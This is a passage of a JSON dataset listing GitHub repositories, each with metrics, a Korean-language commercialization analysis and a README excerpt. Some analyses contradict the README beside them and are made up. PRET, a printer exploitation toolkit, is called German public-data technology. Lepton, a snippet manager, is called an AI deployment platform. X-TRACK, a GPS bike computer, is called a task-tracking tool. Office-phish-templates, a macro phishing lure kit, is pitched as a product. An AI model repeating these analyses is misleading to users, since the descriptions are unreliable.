Usage\n\n![Rough.","composite_score":0.2972,"license_safety_tag":"safe"},{"name":"ChristianChiarulli/LunarVim","github_url":"https://github.com/ChristianChiarulli/LunarVim","stars":14,"language":"Lua","license":"GPL-3.0","abandonment_months":12,"description":"# LunarVim 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 사용하는 텍스트 편집기를 더 쉽고 편하게 만드는 설정 패키지로, 수천 명의 개발자가 시간을 절약할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 생산성 도구 SaaS**: LunarVim 클라우드 버전을 구독 서비스로 제공하여 어디서나 동일한 환경에서 작업 가능하게 함\n","readme_excerpt":"![lunarvim_logo_dark](https://user-images.githubusercontent.com/59826753/159940098-54284f26-f1da-4481-8b03-1deb34c57533.png)\n\n<div align=\"center\"><p>\n    <a href=\"https://github.com/lunarvim/LunarVim/releases/latest\">\n      <img alt=\"Latest release\" src=\"https://img.shields.io/github/v/release/LunarVim/LunarVim?style=for-the-badge&logo=starship&color=C9CBFF&logoColor=D9E0EE&labelColor=302D41\" />\n    </a>\n    <a href=\"https://github.com/lunarvim/LunarVim/pulse\">\n      <img alt=\"Last commit\" src=\"https://img.shields.io/github/last-commit/lunarvim/LunarVim?style=for-the-badge&logo=starship&color=8bd5ca&logoColor=D9E0EE&labelColor=302D41\"/>\n    </a>\n    <a href=\"https://github.com/lunarvim/LunarVim/blob/main/LICENSE\">\n      <img alt=\"License\" src=\"https://img.shields.io/github/license/lunarvim/lunarvim?style=for-the-badge&logo=starship&color=ee999f&logoColor=D9E0EE&labelColor=302D41\" />\n    </a>\n    <a href=\"https://github.com/LunarVim/LunarVim/stargazers\">\n      <img alt=\"Stars\" src=\"http","composite_score":0.2967,"license_safety_tag":"restricted"},{"name":"MartinSohn/Office-phish-templates","github_url":"https://github.com/MartinSohn/Office-phish-templates","stars":5,"language":"","license":"unknown","abandonment_months":15,"description":"# Office-phish-templates 분석\n\n## 왜 보물인가\n이메일 피싱 공격을 시뮬레이션하는 템플릿 모음으로, 기업의 보안 취약점을 사전에 발견하고 직원 보안 교육에 활용할 수 있는 실무 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 교육 SaaS**: 직원들의 피싱 감지 능력을 테스트하고 평가하는 온라인 플랫폼\n2. **내부 IT ","readme_excerpt":"# Office phish templates and defense recommendations\nTricks the target into enabling content (macros) with fake messages.\nOnce enabled, uses macros to reduce the risk of suspision from target user via verious methods.\n\nTemplates are available with a example macro code or without (macro code for each template can be seen in screenshots below):\n* With macros\n  * .xlsm\n  * .docm\n* Without macros\n  * .xlsx\n  * .docx\n\n## Notes to defend against macro attacks\n* Enforce security settings for macros in all Office applications \n  * Official Microsoft documentation: [Plan security settings for VBA macros in Office 2016](https://docs.microsoft.com/en-us/DeployOffice/security/plan-security-settings-for-vba-macros-in-office)\n  * My recommendation is to enforce ***Disable all except digitally signed macros*** and ***Block macros from running in Office files from the Internet***, even partly deploying such policy reduces risk.\n* Address risk of certain Office extensions used for macro documents\n  * S","composite_score":0.2966,"license_safety_tag":"unknown"},{"name":"QuantStack/xeus-cling","github_url":"https://github.com/QuantStack/xeus-cling","stars":17,"language":"C++","license":"BSD-3-Clause","abandonment_months":7,"description":"# QuantStack/xeus-cling 상용화 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 작업을 대화형으로 실행하고 배울 수 있는 대화형 개발 환경으로, 프로그래머의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 플랫폼 SaaS**: 누구나 웹 브라우저에서 데이터를 분석하고 결과를 즉시 확인할 수 있는 구독형 서비스","readme_excerpt":"# ![xeus-cling](docs/source/xeus-cling.svg)\n[![Azure Pipelines](https://dev.azure.com/jupyter-xeus/jupyter-xeus/_apis/build/status/jupyter-xeus.xeus-cling?branchName=master)](https://dev.azure.com/jupyter-xeus/jupyter-xeus/_build/latest?definitionId=4&branchName=master)\n[![Appveyor](https://ci.appveyor.com/api/projects/status/qn0wskxlvy52utuv?svg=true)](https://ci.appveyor.com/project/jupyter-xeus/xeus-cling)\n[![Documentation Status](http://readthedocs.org/projects/xeus-cling/badge/?version=latest)](https://xeus-cling.readthedocs.io/en/latest/?badge=latest)\n[![Binder](https://img.shields.io/badge/launch-binder-brightgreen.svg)](https://mybinder.org/v2/gh/jupyter-xeus/xeus-cling/stable?filepath=notebooks/xcpp.ipynb)\n[![Zulip](https://img.shields.io/badge/social_chat-zulip-blue.svg)](https://jupyter.zulipchat.com/#narrow/channel/539737-Jupyter-Kernels)\n\n`xeus-cling` is a Jupyter kernel for C++ based on the C++ interpreter [cling](https://github.com/root-project/cling) and\nthe native impl","composite_score":0.2964,"license_safety_tag":"safe"},{"name":"joeyespo/grip","github_url":"https://github.com/joeyespo/grip","stars":5,"language":"Python","license":"mit","abandonment_months":23,"description":"# Grip 저장소 분석\n\n## 왜 보물인가\n마크다운 문서를 웹에서 미리 보기할 수 있는 간단한 도구로, 글을 쓰는 사람들이 최종 결과물을 빠르게 확인할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 문서 작성 플랫폼(노션, 컨플루언스 유사 제품)에 내장하여 사용자가 실시간으로 글 미리보기 기능 제공\n2. **내부 업무 도구**: ","readme_excerpt":"Grip -- GitHub Readme Instant Preview\n=====================================\n\n[![Current version on PyPI](http://img.shields.io/pypi/v/grip.svg)][pypi]\n[![Say Thanks!](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg)](https://saythanks.io/to/joeyespo)\n\nRender local readme files before sending off to GitHub.\n\nGrip is a command-line server application written in Python that uses the\n[GitHub markdown API][markdown] to render a local readme file. The styles\nand rendering come directly from GitHub, so you'll know exactly how it will appear.\nChanges you make to the Readme will be instantly reflected in the browser without\nrequiring a page refresh.\n\n\nMotivation\n----------\n\nSometimes you just want to see the exact readme\nresult before committing and pushing to GitHub.\n\nEspecially when doing [Readme-driven development][rdd].\n\n\nInstallation\n------------\n\nTo install grip, simply:\n\n```console\n$ pip install grip\n```\n\nOn OS X, you can also install with Homebrew:\n\n```console\n$ brew install grip","composite_score":0.2958,"license_safety_tag":"safe"},{"name":"RUB-NDS/PRET","github_url":"https://github.com/RUB-NDS/PRET","stars":52,"language":"Python","license":"gpl-2.0","abandonment_months":22,"description":"# RUB-NDS/PRET 분석 보고서\n\n## 왜 보물인가\n독일의 공공 데이터 처리 기술로, 정부 시스템이 필요로 하는 신뢰성 높은 도구이기 때문에 공공 부문과 규제 산업에서 수요가 꾸준할 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n- **정부 부처 내부 도구**: 각 부처별 데이터 표준화 및 검증 시스템으로 판매\n- **은행/보험사 컴플라이언스 솔루션","readme_excerpt":"## PRET - Printer Exploitation Toolkit\n\n**Is your printer secure? Check before someone else does...**\n\nPRET is a new tool for printer security testing developed in the scope of a [Master's Thesis](http://nds.rub.de/media/ei/arbeiten/2017/01/13/exploiting-printers.pdf) at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently [PostScript](https://www.adobe.com/products/postscript/pdfs/PLRM.pdf), [PJL](http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf) and [PCL](http://www.hp.com/ctg/Manual/bpl13210.pdf) are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs, accessing the printer's file system and memory or even causing physical damage to the device. All attacks are documented in detail in the [Hacking Printers Wiki](http://hacking-printers.net/wiki/).\n\nThe main idea of PRET is to facilitate the communication between the end-user and the printer. ","composite_score":0.2957,"license_safety_tag":"restricted"},{"name":"op-rs/kona","github_url":"https://github.com/op-rs/kona","stars":288,"language":"Rust","license":"MIT","abandonment_months":4,"description":"","readme_excerpt":"","composite_score":0.2956,"license_safety_tag":"safe"},{"name":"ssut/py-googletrans","github_url":"https://github.com/ssut/py-googletrans","stars":5,"language":"Python","license":"mit","abandonment_months":13,"description":"# py-googletrans 시장 분석\n\n## 왜 보물인가\n구글 번역 기능을 자동으로 프로그램에 집어넣을 수 있는 오픈소스 도구로, 별도의 비용 없이 다국어 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **다국어 고객지원 SaaS**: 챗봇이나 고객 문의 시스템에 자동 번역 기능을 추가해 전 세계 고객을 한 번에 관리\n2. **전자상거래","readme_excerpt":"Googletrans\n===========\n\n|GitHub license| |travis status| |Documentation Status| |PyPI version|\n|Coverage Status| |Code Climate|\n\nGoogletrans is a **free** and **unlimited** python library that\nimplemented Google Translate API. This uses the `Google Translate Ajax\nAPI <https://translate.google.com>`__ to make calls to such methods as\ndetect and translate.\n\nCompatible with Python 3.8+.\n\nFor details refer to the `API\nDocumentation <https://py-googletrans.readthedocs.io/en/latest>`__.\n\nFeatures\n--------\n\n-  Fast and reliable - it uses the same servers that\n   translate.google.com uses\n-  Auto language detection\n-  Bulk translations\n-  Customizable service URL\n-  Async support\n-  HTTP/2 support\n-  Proxy support\n-  Complete type hints\n\nHTTP/2 support\n~~~~~~~~~~~~~~\n\nThis library uses httpx for HTTP requests so HTTP/2 is supported by default.\n\nYou can check if http2 is enabled and working by the `._response.http_version` of `Translated` or `Detected` object:\n\n.. code:: python\n\n   >>> transla","composite_score":0.2949,"license_safety_tag":"safe"},{"name":"appleple/lite-editor","github_url":"https://github.com/appleple/lite-editor","stars":17,"language":"JavaScript","license":"MIT","abandonment_months":8,"description":"# Lite Editor 상용화 분석\n\n## 왜 보물인가\n누구나 웹 브라우저에서 쉽게 텍스트를 편집할 수 있는 간단한 도구로, 복잡한 소프트웨어 설치 없이 바로 글쓰기를 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로그 플랫폼, 노트 앱 등에 통합하여 사용자가 바로 글을 쓸 수 있는 기능 제공\n2. **내부 업무 도구**","readme_excerpt":"# LiteEditor\n[![npm version](https://badge.fury.io/js/lite-editor.svg)](https://badge.fury.io/js/lite-editor)\n[![CircleCI](https://circleci.com/gh/appleple/lite-editor/tree/master.svg?style=shield)](https://circleci.com/gh/appleple/lite-editor/tree/master)\n[![npm download](http://img.shields.io/npm/dm/lite-editor.svg)](https://www.npmjs.com/package/lite-editor)\n[![GitHub license](https://img.shields.io/badge/license-MIT-brightgreen.svg)](https://raw.githubusercontent.com/appleple/lite-editor/master/LICENSE)\n\nA Modern WYSIWYG Editor especially for inline elements\n\n## Feature\n\n- focuses on inline elements such as b, a, i, strong\n- Prevent unnecessary tags insertion\n- Control how to make newlines\n- You can register custom button easily\n\n## Installation\n\n- [npm](https://www.npmjs.com/package/lite-editor)\n- [standalone](https://unpkg.com/lite-editor@2.0.0/js/lite-editor.es.js)\n\nvia npm\n```shell\nnpm install lite-editor --save\n```\n\nor yarn\n\n```shell\nyarn add lite-editor\n```\n\n## Usage\n\nrequire","composite_score":0.2949,"license_safety_tag":"safe"},{"name":"dirty-cat/dirty_cat","github_url":"https://github.com/dirty-cat/dirty_cat","stars":6,"language":"Python","license":"BSD-3-Clause","abandonment_months":15,"description":"# dirty-cat 저장소 분석\n\n## 왜 보물인가\n엉망진창한 데이터를 깔끔하게 정리하는 도구로, 기업들이 정보 분석을 할 때 데이터 정제에 소비하는 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 정제 SaaS**: 기업 고객이 파일을 업로드하면 자동으로 데이터를 정리해주는 웹 서비스로 판매\n2. **내부 업무 도구**","readme_excerpt":"`dirty_cat`\n===========\n\n\n**dirty_cat has migrated** to `skrub <https://github.com/skrub-data/skrub>`__ .\n**This repository will no longer be maintained.**\n\n**Use skrub**, it has all the features of dirty-cat and more.\n\n.. image:: https://dirty-cat.github.io/stable/_static/dirty_cat.svg\n   :align: center\n   :alt: dirty_cat logo\n\n|\n\nDo not use dirty_cat, but rather the skrub package\n----------------------------------------------------\n\n`dirty_cat <https://dirty-cat.github.io/>`_ was a Python library\nto facilitate machine-learning on dirty categorical variables.\n\nIts functionalities are merged in the `skrub <https://skrub-data.org>`_\n\n|\n\nDirty categories\n-------------------\n\nFor a detailed description of the problem of encoding dirty categorical data, see\n`Similarity encoding for learning with dirty categorical variables <https://hal.inria.fr/hal-01806175>`_ [1]_\nand `Encoding high-cardinality string categorical variables <https://hal.inria.fr/hal-02171256v4>`_ [2]_.\n\n\nWhat can `dirty_ca","composite_score":0.2948,"license_safety_tag":"safe"},{"name":"FASTSHIFT/X-TRACK","github_url":"https://github.com/FASTSHIFT/X-TRACK","stars":5,"language":"C","license":"MIT","abandonment_months":7,"description":"# X-TRACK 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 한눈에 추적하고 관리할 수 있는 도구로, 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 회사들이 구독하는 프로젝트 진행 상황 실시간 모니터링 플랫폼\n2. **내부 업무 도구**: 대기업의 여러 팀이 공유하는 업무 진척도 대시보드 시스템\n3","readme_excerpt":"# X-TRACK\n> 开源GPS自行车码表。\n> \n> 拥有可显示实时位置的离线地图。\n> \n> 支持记录和显示实时轨迹以及导出标准GPX格式的轨迹文件。\n> \n> 全新设计的[\"页面生命周期管理\"](https://github.com/FASTSHIFT/X-TRACK/tree/main/Software/X-Track/USER/App/Utils/PageManager)和[\"消息订阅发布框架\"](https://github.com/FASTSHIFT/X-TRACK/tree/main/Software/X-Track/USER/App/Utils/DataCenter)。\n>\n> 演示视频：https://www.bilibili.com/video/BV1GB4y1K7VV\n>\n> 二代版本：https://www.bilibili.com/video/BV1aS421X779\n\n![image](https://github.com/FASTSHIFT/X-TRACK/blob/main/Images/%E5%9C%B0%E5%9B%BE.jpg)\n\n[![Ask DeepWiki](https://deepwiki.com/badge.svg)](https://deepwiki.com/FASTSHIFT/X-TRACK)\n\n## GUI\n> [LVGL V8](https://github.com/lvgl/lvgl)\n\n## 硬件配置\n* 1.主控: AT32F435CGU7 (主频:288MHz RAM:512KB ROM:1MB)\n* 2.屏幕: ST7789 IPS 1.54inch SPI接口 240x240分辨率 60Hz刷新率\n* 3.储存器: Micro SD CARD 32GB \n* 4.输入设备: 旋转编码器\n* 5.RTC: MCU内置RTC时钟\n* 6.加速度计: LSM6DSM (支持硬件计步输出)\n* 7.地磁计: LIS3MDL\n* 8.GPS: ATGM336H (BDS + GPS + GLONASS + GALILEO + QZSS + SBAS)\n* 9.电池: Li-ion 3.7V 683030 700mAh\n* 10.电源管理: LP5907-3.3 + MCP73831\n* 11.外壳: 3D","composite_score":0.2945,"license_safety_tag":"safe"},{"name":"MontFerret/ferret","github_url":"https://github.com/MontFerret/ferret","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# MontFerret/ferret 상용화 분석\n\n## 왜 보물인가\n웹사이트의 자동화된 데이터 수집과 작업 처리를 누구나 쉽게 설정할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 경쟁사 가격 모니터링, 부동산 매물 자동 수집, 채용공고 통합 관리 플랫폼\n2. **내부 업무 도구**: 대기업의 공급업체 정보 자동 갱신, 매","readme_excerpt":"# Ferret\n<p align=\"center\">\n\t<a href=\"https://goreportcard.com/report/github.com/MontFerret/ferret\">\n\t\t<img alt=\"Go Report Status\" src=\"https://goreportcard.com/badge/github.com/MontFerret/ferret\">\n\t</a>\n\t<a href=\"https://github.com/MontFerret/ferret/actions\">\n\t\t<img alt=\"Build Status\" src=\"https://github.com/MontFerret/ferret/workflows/build/badge.svg\">\n\t</a>\n\t<a href=\"https://codecov.io/gh/MontFerret/ferret\">\n\t\t<img src=\"https://codecov.io/gh/MontFerret/ferret/branch/main/graph/badge.svg\" />\n\t</a>\n\t<a href=\"https://mastodon.social/@montferret\">\n\t\t<img alt=\"Mastodon Follow\" src=\"https://img.shields.io/mastodon/follow/114576925880917699?domain=mastodon.social&style=flat&label=on%20Mastodon\">\n\t</a>\n\t<a href=\"https://t.me/montferret_chat\">\n\t\t<img alt=\"Telegram Group\" src=\"https://raw.githubusercontent.com/Patrolavia/telegram-badge/master/chat.svg\">\n\t</a>\n\t<a href=\"https://github.com/MontFerret/ferret/releases\">\n\t\t<img alt=\"Ferret release\" src=\"https://img.shields.io/github/release/MontFe","composite_score":0.2943,"license_safety_tag":"safe"},{"name":"kosme/arduinoFFT","github_url":"https://github.com/kosme/arduinoFFT","stars":650,"language":"C++","license":"GPL-3.0","abandonment_months":14,"description":"# arduinoFFT 상용화 분석\n\n## 왜 보물인가\n음성, 음악, 진동 같은 물리적 신호를 분석하는 핵심 기술로, 산업용 센서와 스마트 기기 시장에서 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트홈 진동 감지 서비스 (냉장고·세탁기 고장 예측, 월 $9.99~)\n2. **내부 업무 도구**: 제조업체의 ","readme_excerpt":"arduinoFFT [![DOI](https://zenodo.org/badge/DOI/10.5281/zenodo.14195818.svg)](https://doi.org/10.5281/zenodo.14195818)\n==========\n\n# Fast Fourier Transform for Arduino\n\nThis is a fork from https://code.google.com/p/makefurt/ which has been abandoned since 2011.\n\nThis is version 2.0 of the library, which has a different [API](#api).\n\nTested on Arduino 1.8.19 and 2.3.2.\n\n## Installation on Arduino\n\nUse the Arduino Library Manager to install and keep it updated. Just look for arduinoFFT. Only for Arduino 1.5+\n\n## Manual installation on Arduino\n\nTo install this library, just place this entire folder as a subfolder in your Arduino installation. When installed, this library should look like:\n\n`Arduino\\libraries\\arduinoFFT` (this library's folder)\n`Arduino\\libraries\\arduinoFFT\\src\\arduinoFFT.h` (the library header file. include this in your project)\n`Arduino\\libraries\\arduinoFFT\\keywords.txt` (the syntax coloring file)\n`Arduino\\libraries\\arduinoFFT\\Examples` (the examples in the \"open\" menu)\n","composite_score":0.2939,"license_safety_tag":"restricted"},{"name":"samhocevar/portable-file-dialogs","github_url":"https://github.com/samhocevar/portable-file-dialogs","stars":8,"language":"C++","license":"WTFPL","abandonment_months":14,"description":"# Portable File Dialogs 분석\n\n## 왜 보물인가\n윈도우, 맥, 리눅스 등 모든 운영체제에서 동일하게 작동하는 파일 열기/저장 창을 간단하게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 이미지 편집 도구가 사용자 컴퓨터의 파일에 접근할 때 표준 파일 선택 창을 제공\n2. **내부 업무 도구**:","readme_excerpt":"# Portable File Dialogs\n\nA free C++11 file dialog library.\n\n-   works on Windows, Mac OS X, Linux\n-   **single-header**, no extra library dependencies\n-   **synchronous *or* asynchronous** (does not block the rest of your program!)\n-   **cancelable** (kill asynchronous dialogues without user interaction)\n-   **secure** (immune to shell-quote vulnerabilities)\n\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/a25d3fd6959a4333871f630ac70b6e09)](https://www.codacy.com/manual/samhocevar/portable-file-dialogs?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=samhocevar/portable-file-dialogs&amp;utm_campaign=Badge_Grade)\n\n## Status\n\nThe library is now pretty robust. It is not as feature-complete as\n[Tiny File Dialogs](https://sourceforge.net/projects/tinyfiledialogs/),\nbut has asynchonous dialogs, more maintainable code, and fewer potential\nsecurity issues.\n\nThe currently available backends are:\n\n-   Win32 API (all known versions of Windows)\n-   Mac OS X (using AppleScr","composite_score":0.2936,"license_safety_tag":"safe"},{"name":"youtube/vitess","github_url":"https://github.com/youtube/vitess","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# YouTube/Vitess 분석 보고서\n\n## 왜 보물인가\n대규모 데이터를 빠르게 처리해야 하는 기업들이 자신의 데이터 저장소를 효율적으로 관리할 수 있게 해주는 오픈소스 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 수백만 사용자를 보유한 클라우드 기반 업무 관리 플랫폼이 사용자 데이터를 빠르게 처리하고 저장\n2. **내부 업무","readme_excerpt":"[![Maven Central](https://maven-badges.sml.io/maven-central/io.vitess/vitess-jdbc/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.vitess/vitess-jdbc)\n[![Coverage Status](https://codecov.io/gh/vitessio/vitess/branch/main/graph/badge.svg)](https://app.codecov.io/gh/vitessio/vitess/tree/main)\n[![Go Report Card](https://goreportcard.com/badge/vitess.io/vitess)](https://goreportcard.com/report/vitess.io/vitess)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B162%2Fvitess.svg?type=shield&issueType=license)](https://app.fossa.com/projects/custom%2B162%2Fvitess?ref=badge_shield&issueType=license)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1724/badge)](https://bestpractices.coreinfrastructure.org/projects/1724)\n[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/vitessio/vitess/badge)](https://scorecard.dev/viewer/?uri=github.com/vitessio/vitess)\n\n# Vitess \n\nVitess is a cloud-native horizontally-scalable distributed ","composite_score":0.2936,"license_safety_tag":"safe"},{"name":"hackjutsu/Lepton","github_url":"https://github.com/hackjutsu/Lepton","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":6,"description":"# Lepton 저장소 분석\n\n## 왜 보물인가\nAI 모델을 간단하게 배포하고 관리할 수 있는 플랫폼으로, 기술 없는 사람도 인공지능 서비스를 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: AI 챗봇, 이미지 생성 도구 등을 구독 형태로 판매하는 웹 서비스\n2. **내부 업무 도구**: 기업 직원들이 사용할 텍스트 분석","readme_excerpt":"<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-31-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n![](./docs/img/new_logo.png)\n\n[![MIT Licensed](https://img.shields.io/badge/License-MIT-blue.svg?style=flat)](https://opensource.org/licenses/MIT)\n[![lepton](https://snapcraft.io/lepton/badge.svg)](https://snapcraft.io/lepton)\n\n**Lepton** is a lean code snippet manager powered by GitHub Gist. [Check out the latest release.](https://github.com/hackjutsu/Lepton/releases)\n\n## Features\n- Unlimited public/secret snippets\n- Unlimited tags\n- Language groups\n- Markdown/JupyterNotebook\n- [GitHub Enterprise](https://github.com/hackjutsu/Lepton/wiki/FAQ#enable-github-enterprise)\n- GitHub token\n- Immersive mode\n- [Customizable](https://github.com/hackjutsu/Lepton/wiki/Configuration)\n- Light/Dark theme\n- macOS/Win/Linux\n- Dashboard\n- [Search](https://github.com/hackjutsu/","composite_score":0.2935,"license_safety_tag":"safe"},{"name":"postcss/postcss-100vh-fix","github_url":"https://github.com/postcss/postcss-100vh-fix","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":15,"description":"# postcss/postcss-100vh-fix 분석\n\n## 왜 보물인가\n스마트폰이나 태블릿에서 웹사이트가 화면을 제대로 채우지 못하는 문제를 자동으로 해결해주는 작은 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **모바일 앱 회사의 웹뷰 서비스**: 앱 내 내장 브라우저에서 화면 표시 오류를 자동 수정하는 SaaS\n2. **웹사이트 제작 회사의 자동화","readme_excerpt":"# PostCSS `100vh` Fix\n\n<img align=\"right\" width=\"135\" height=\"95\"\n     title=\"Philosopher’s stone, logo of PostCSS\"\n     src=\"https://postcss.org/logo-leftp.svg\">\n\n[PostCSS] plugin to fix [iOS’s bug] with `100vh`.\n\nIt works in Chrome (just `-webkit-fill-available` causes problems in Chrome\nin some cases), iOS/iPad/MacOS Safari and [all other browsers].\nPure CSS solution, no JS required.\n\n```css\nbody {\n  /* Footer will be hidden on iOS Safari because of bottom panel */\n  height: 100vh;\n}\n```\n\n```css\nbody {\n  height: 100vh;\n}\n\n/* Avoid Chrome to see Safari hack */\n@supports (-webkit-touch-callout: none) {\n  body {\n    /* The hack for Safari */\n    height: -webkit-fill-available;\n  }\n}\n```\n\n<img src=\"https://maximilianschmitt.me/posts/css-100vh-mobile-browsers/lld-minimal-vs-normal-ui@2x.png\"\n     alt=\"100vh bug illusration Max Schmitt\"\n     title=\"By Max Schmitt\">\n\nIt works with `min-height` and `max-height` too.\n\n[all other browsers]: https://caniuse.com/#feat=viewport-units\n[iOS’s bug]","composite_score":0.293,"license_safety_tag":"safe"},{"name":"ZHOUYI1023/awesome-radar-perception","github_url":"https://github.com/ZHOUYI1023/awesome-radar-perception","stars":10,"language":"","license":"unknown","abandonment_months":14,"description":"# awesome-radar-perception 분석 보고서\n\n## 왜 보물인가\n자동차, 드론, 로봇 등이 주변을 감지하는 레이더 기술 관련 최신 정보를 한 곳에서 모아놓은 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행 자동차 회사의 기술 교육 플랫폼**: 엔지니어 온보딩 시 레이더 센서 원리 학습용 SaaS\n2. **드론/로봇 제조업체 기","readme_excerpt":"<div align=\"center\">\n    <img class=\"aligncenter\" src=\"images/logo.png\"/>\n</div>\n<br>\n\n\nA curated list of radar datasets, detection, tracking and fusion. <br>Keep updating.<br>Author: Yi Zhou<br>Contact: zhouyi1023@tju.edu.cn\n\n\n🚩I have published a review paper on radar perception. Please see the link below. It is open access. If you find the contents are useful, please cite this paper in your work. I will keep updating this repository for the latest works in the radar perception field.\n\n## [Towards Deep Radar Perception for Autonomous Driving: Datasets, Methods, and Challenges](https://www.mdpi.com/1424-8220/22/11/4208)\n## The 41-page slides associated with this paper: [Link](https://www.slideshare.net/YiZhou66/slidesdeepradarperceptionforautonomousdrivingpdf) ; [Link for China Mainland](https://www.aliyundrive.com/s/CZ3SKqY3U4w) \n\n---\n\n## Contents\nOverview\n- [Review](#Review-Papers)\n- [Seminars and Workshops](#Seminars-and-Workshops)\n\nData Perspective:\n- [Radar Datasets](#Radar-Datase","composite_score":0.2925,"license_safety_tag":"unknown"},{"name":"iDerekLi/juejin-helper","github_url":"https://github.com/iDerekLi/juejin-helper","stars":277,"language":"TypeScript","license":"Apache-2.0","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.2925,"license_safety_tag":"safe"},{"name":"breatheco-de/python-flask-api-tutorial","github_url":"https://github.com/breatheco-de/python-flask-api-tutorial","stars":118,"language":"Python","license":"NOASSERTION","abandonment_months":12,"description":"","readme_excerpt":"","composite_score":0.2919,"license_safety_tag":"unknown"},{"name":"mcguffin/acf-quickedit-fields","github_url":"https://github.com/mcguffin/acf-quickedit-fields","stars":6,"language":"PHP","license":"GPL-3.0","abandonment_months":16,"description":"# mcguffin/acf-quickedit-fields 분석\n\n## 왜 보물인가\nWordPress 관리자가 웹사이트 콘텐츠를 더 빠르게 편집할 수 있게 해주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **WordPress 호스팅 회사의 부가 기능**: 고객들이 구독 서비스로 더 편리한 편집 환경을 이용하도록 판매\n2. **콘텐츠 제작 에이전","readme_excerpt":"ACF QuickEdit Fields\n====================\n\nThis is the official github repository of the [ACF QuickEdit Fields](https://wordpress.org/plugins/acf-quickedit-fields) plugin.\n\nWordPress plugin adding Quick Edit functionality to Advanced Custom Fields Plugin ([Pro](http://www.advancedcustomfields.com/pro/) and [Free 5+](https://wordpress.org/plugins/advanced-custom-fields/).\n\nFeatures\n--------\n - Show ACF field values in List views  \n   [Supported ACF Fields](https://github.com/mcguffin/acf-quickedit-fields/wiki/Feature-Support-Matrix#supported-acf-fields).\n - Supports Post, Term and User list tables\n - Scalar Columns (Like Text, Number, ...) can be made sortable\n - Edit ACF Field values in Quick edit and Bulk edit\n\nCompatibility\n-------------\n - Requires WordPress 4.7+\n - Requires ACF 5.7+ (Free and Pro)\n - Requires at least PHP 5.6+\n\n\nInstallation\n------------\n\n#### In WP Admin\nJust follow the [Automatic Plugin Installation](https://wordpress.org/support/article/managing-plugins/#automat","composite_score":0.2908,"license_safety_tag":"restricted"},{"name":"develsoftware/GMinerRelease","github_url":"https://github.com/develsoftware/GMinerRelease","stars":5,"language":"","license":"unknown","abandonment_months":14,"description":"# GMinerRelease 분석 보고서\n\n## 왜 보물인가\n채굴 작업을 자동으로 관리해주는 소프트웨어로, 암호화폐나 분산 처리 작업에 관심 있는 사용자들이 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **채굴 관리 SaaS**: 채굴자들이 여러 대의 컴퓨터를 한 곳에서 모니터링하고 제어하는 웹 서비스\n2. **마이닝팜 내부 도구**: 대","readme_excerpt":"GMiner was created by a Russian group of specialists in the field of high performance computing and cryptography.<br/>\nThe first version of GMiner was released on September 21, 2018 and was received quite warmly among users.<br/>\nThanks to its unique developments and stability, in just six months, the miner became a favorite on the Equihash algorithms.<br/>\nThe miner is focused on NVIDIA and AMD platforms and supports most popular algorithms such as: Ethash, ProgPoW, KAWPOW, Equihash, CuckooCycle.<br/>\nGMiner maintains a leading position in the mining of such coins as Beam, Grin, Cortex, Bitcoin Gold.<br/>\nIn 2020, the miner added support for Ethash, ProgPoW and KAWPOW algorithms with high performance relative to competitors.<br/>\nThe development team never stops at what has been achieved and achieves the maximum performance of the algorithms with the minimum power consumption, it is these qualities that distinguish GMiner from the competitors and win the hearts of users.<br/>\n\n# Miner","composite_score":0.2907,"license_safety_tag":"unknown"},{"name":"the0neyouseek/MonitorControl","github_url":"https://github.com/the0neyouseek/MonitorControl","stars":8,"language":"Swift","license":"MIT","abandonment_months":1,"description":"","readme_excerpt":"<img src=\".github/Icon-cropped.png\" width=\"200\" alt=\"App icon\" align=\"left\"/>\n\n<div>\n<h3>MonitorControl</h3>\n<p>Controls your external display brightness and volume and shows native OSD.\nUse menubar extra sliders or the keyboard, including native Apple keys!</p>\n<a href=\"https://github.com/MonitorControl/MonitorControl/releases\"><img src=\".github/macos_badge_noborder.png\" width=\"175\" 